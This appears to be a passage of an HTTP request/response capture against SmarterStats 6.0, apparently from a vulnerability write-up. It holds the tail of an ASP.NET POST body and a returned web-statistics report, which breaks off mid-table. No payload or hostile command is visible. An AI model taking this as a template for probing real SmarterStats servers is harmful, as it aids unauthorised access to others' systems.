mQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFyvU7iaHYBbKQeGtHw6kNdeUAPWDYACUzT5UpfA6p01Wc%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMReport=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:27 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 45388

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |38138|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Top Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Top_Pages"> <div class='ReportChart'><img src="/Temp/3022c349e42e4a16915d331a96969eb5.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fapptesting.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>apptesting.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
24,906</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
1,494</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol '>
<div class='percent percent8'></div>
7,968</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
676</td>
<td class='ar percentcol rc'>
<div class='percent percent7'></div>
431</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,980</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
33</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
361</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,732</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent8'></div>
502</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
354</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
17</td>
<td class='ar percentcol rc'>
<div class='percent percent4'></div>
270</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsitemap.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sitemap.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,332</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent3'></div>
192</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,091</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
161</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent3'></div>
3,121</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
153</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
2,122</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
20</td>
<td class='ar percentcol rc'>
<div class='percent percent11'></div>
665</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Other Items (13)</td>
<td class='FooterTotal ar percentcol'>707</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>10</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>4,594</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar percentcol'>3,048</td>
<td class='FooterAverages ar percentcol'>&nbsp;</td>
<td class='FooterAverages ar rc percentcolrc'>200</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Referring Sites</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ReferringSites"> <div class='ReportChart'><img src="/Temp/b2972344c54b45e38070638051bc9478.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Host</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'>No Referrer <i>(bookmark or direct-entry)</i></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
681</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '><a href="http://www.sitetalk-world.info" target="_blank" class='ReportLink'>www.sitetalk-world.info</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '><a href="http://www.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>www.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '><a href="http://yandex.ru" target="_blank" class='ReportLink'>yandex.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '><a href="http://seo.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>seo.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '><a href="http://www.sitetalk-friends.com" target="_blank" class='ReportLink'>www.sitetalk-friends.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '><a href="http://www.way-to-success.com" target="_blank" class='ReportLink'>www.way-to-success.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '><a href="http://www2.fastdial.net" target="_blank" class='ReportLink'>www2.fastdial.net</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '><a href="http://www.google.ru" target="_blank" class='ReportLink'>www.google.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '><a href="http://support.mozilla.com" target="_blank" class='ReportLink'>support.mozilla.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (8)</td>
<td class='FooterTotal ar rc percentcolrc'>8</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>39</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Entry Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_EntryPages"> <div class='ReportChart'><img src="/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
668</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
21</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fimages%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>images<wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcrossdomain.xml','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>crossdomain.xml</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>70</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Paths</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_Paths"> <div class='ReportChart'><img src="/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Path</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>/</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
671</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>/sales.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sitemap.aspx<BR>/<BR>/learning.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>/<BR>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscan-netsparker-report.htm<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>/images/<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>/<BR>/cloudscandetails.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>/test.aspx<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/report.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>/test.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (16)</td>
<td class='FooterTotal ar rc percentcolrc'>16</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>27</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Platforms</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Platforms"> <div class='ReportChart'><img src="/Temp/20226bc24c8e4c89926647164054826e.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Platform</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Win XP</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
677</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
374</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
6,097</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
53</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Win 7 / 2008 R2</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
177</td>
<td class='ar percentcol '>
<div class='percent percent10'></div>
148</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
3,211</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
25</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Win Vista / 2008</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
68,935</td>
<td class='ar percentcol '>
<div class='percent percent6'></div>
95</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,451</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,599</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
51</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
92</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Linux</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
32</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
18</td>
